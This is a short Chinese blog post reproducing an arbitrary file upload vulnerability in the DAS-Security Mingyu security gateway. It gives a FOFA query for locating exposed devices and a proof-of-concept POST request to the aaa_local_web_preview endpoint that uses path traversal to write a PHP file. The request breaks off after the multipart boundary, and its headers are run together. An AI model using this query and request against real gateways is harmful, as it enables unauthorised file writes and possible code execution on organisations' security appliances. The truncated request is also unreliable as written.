安恒明御安全网关aaa_local_web_preview 任意文件上传漏洞复现

简介

安恒明御安全网关是一个网络安全产品,由安恒信息技术股份有限公司开发和提供。它是一个综合性的安全管理平台,用于保护企业网络免受各种网络威胁的攻击。

该产品aaa_local_web_preview端点存在文件上传漏洞。

漏洞复现

FOFA语法:

title=="明御安全网关"

安恒明御安全网关aaa_local_web_preview 任意文件上传漏洞复现_第1张图片

界面访问如下所示:

安恒明御安全网关aaa_local_web_preview 任意文件上传漏洞复现_第2张图片

POC:

POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../test.php HTTP/1.1Host: ipUser-Agent: Mozilla/5.0Content-Type: multipart/form-data; boundary=849978f98abe41119122148e4aa65b1aAccept-Encoding: gzipContent-Length: 200
--849978f98abe41119122148e4aa65b1a

你可能感兴趣的:(漏洞复现,安全,web安全)